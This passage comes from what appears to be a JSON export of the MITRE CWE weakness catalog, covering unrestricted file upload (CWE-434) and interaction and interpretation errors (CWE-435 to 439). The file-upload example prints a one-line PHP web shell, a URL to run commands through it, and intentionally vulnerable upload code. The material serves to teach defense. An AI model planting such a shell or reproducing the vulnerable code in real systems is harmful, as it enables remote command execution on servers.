privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type \\"file\\".","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"upload_picture.php\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$target = \\"pictures/\\" . basename($_FILES[\'uploadedfile\'][\'name\']);if(move_uploaded_file($_FILES[\'uploadedfile\'][\'tmp_name\'], $target)){}else{}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// Define the target location where the picture being","// uploaded is going to be saved.","// Move the uploaded file to the new location."],"xhtml:div":[{"#text":"echo \\"The picture has been successfully uploaded.\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"There was an error uploading the picture, please try again.\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"malicious.php"},{"attr":{"@_Nature":"attack","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php?&gt;","xhtml:div":{"#text":"system($_GET[\'cmd\']);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l"}],"Body_Text":["Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory.","The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:","Since this filename ends in \\".php\\" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:","Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as:","which runs the \\"ls -l\\" command - or any other type of command that the attacker wants to specify."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0901","Description":"Web-based mail product stores \\".shtml\\" attachments that could contain SSI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0901"},{"Reference":"CVE-2002-1841","Description":"PHP upload does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1841"},{"Reference":"CVE-2005-1868","Description":"upload and execution of .php file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1868"},{"Reference":"CVE-2005-1881","Description":"upload file with dangerous extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1881"},{"Reference":"CVE-2005-0254","Description":"program does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0254"},{"Reference":"CVE-2004-2262","Description":"improper type checking of uploaded files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262"},{"Reference":"CVE-2006-4558","Description":"Double \\"php\\" extension leaves an active php extension in the generated filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4558"},{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2005-3288","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3288"},{"Reference":"CVE-2006-2428","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2428"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted File Upload"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-434"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-422"}},{"attr":{"@_External_Reference_ID":"REF-423"}},{"attr":{"@_External_Reference_ID":"REF-424"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;File Uploading&#34;, Page 1068"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-434"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184).","This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems."]},{"#text":"PHP applications are most targeted, but this likely applies to other languages that support file upload, as well as non-web technologies. ASP applications have also demonstrated this problem.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted File Upload","attr":{"@_Date":"2010-02-16"}}}},"435":{"attr":{"@_ID":"435","@_Name":"Improper Interaction Between Multiple Correctly-Behaving Entities","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses.","Extended_Description":"When a system or process combines multiple independent components, this often produces new, emergent behaviors at the system level.  However, if the interactions between these components are not fully accounted for, some of the emergent behaviors can be incorrect or even insecure.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Interaction Error"},{"Term":"Emergent Fault"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Unexpected State","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Interaction Errors"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-568"}}},"Notes":{"Note":{"#text":"The \\"Interaction Error\\" term, in CWE and elsewhere, is only intended to describe products that behave according to specification. When one or more of the products do not comply with specifications, then it is more likely to be API Abuse (CWE-227) or an interpretation conflict (CWE-436). This distinction can be blurred in real world scenarios, especially when \\"de facto\\" standards do not comply with specifications, or when there are no standards but there is widespread adoption. As a result, it can be difficult to distinguish these weaknesses during mapping and classification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"}],"Previous_Entry_Name":[{"#text":"Interaction Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Interaction Error","attr":{"@_Date":"2017-11-08"}},{"#text":"Improper Interaction Between Multiple Entities","attr":{"@_Date":"2018-03-27"}}]}},"436":{"attr":{"@_ID":"436","@_Name":"Interpretation Conflict","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B\'s state.","Extended_Description":"This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The paper \\"Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection\\" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences."},{"Intro_Text":"Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1215","Description":"Bypass filters or poison web cache using requests with multiple Content-Length headers, a non-standard behavior.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215"},{"Reference":"CVE-2002-0485","Description":"Anti-virus product allows bypass via Content-Type and Content-Disposition headers that are mixed case, which are still processed by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-2002-1978","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1978"},{"Reference":"CVE-2002-1979","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1979"},{"Reference":"CVE-2002-0637","Description":"Virus product bypass with spaces between MIME header fields and the \\":\\" separator, a non-standard message that is accepted by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2002-1777","Description":"AV product detection bypass using inconsistency manipulation (file extension in MIME Content-Type vs. Content-Disposition field).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1777"},{"Reference":"CVE-2005-3310","Description":"CMS system allows uploads of files with GIF/JPG extensions, but if they contain HTML, Internet Explorer renders them as HTML instead of images.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3310"},{"Reference":"CVE-2005-4260","Description":"Interpretation conflict allows XSS via invalid \\"&lt;\\" when a \\"&gt;\\" is expected, which is treated as \\"&gt;\\" by many web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4260"},{"Reference":"CVE-2005-4080","Description":"Interpretation conflict (non-standard behavior) enables XSS because browser ignores invalid characters in the middle of tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4080"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretation Error (MIE)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":27,"Entry_Name":"HTTP Response Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"273"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-427"}},{"attr":{"@_External_Reference_ID":"REF-428"}},{"attr":{"@_External_Reference_ID":"REF-429"}},{"attr":{"@_External_Reference_ID":"REF-430"}},{"attr":{"@_External_Reference_ID":"REF-431"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Multiple Interpretation Error (MIE)","attr":{"@_Date":"2008-04-11"}}}},"437":{"attr":{"@_ID":"437","@_Name":"Incomplete Model of Endpoint Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint\'s features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"HTTP request smuggling is an attack against an intermediary such as a proxy. This attack works because the proxy expects the client to parse HTTP headers one way, but the client parses them differently."},{"Intro_Text":"Anti-virus products that reside on mail servers can suffer from this issue if they do not know how a mail client will handle a particular attachment. The product might treat an attachment type as safe, not knowing that the client\'s configuration treats it as executable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Unhandled Features"}},"Notes":{"Note":{"#text":"This can be related to interaction errors, although in some cases, one of the endpoints is not performing correctly according to specification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Extra Unhandled Features","attr":{"@_Date":"2008-04-11"}}}},"439":{"attr":{"@_ID":"439","@_Name":"Behavioral Change in New Version or Environment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A\'s behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Functional change"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1976","Description":"Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1976"},{"Reference":"CVE-2005-1711","Description":"Product uses defunct method from another product that does not return an error code and allows detection avoidance.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1711"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CHANGE Behavioral Change"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content 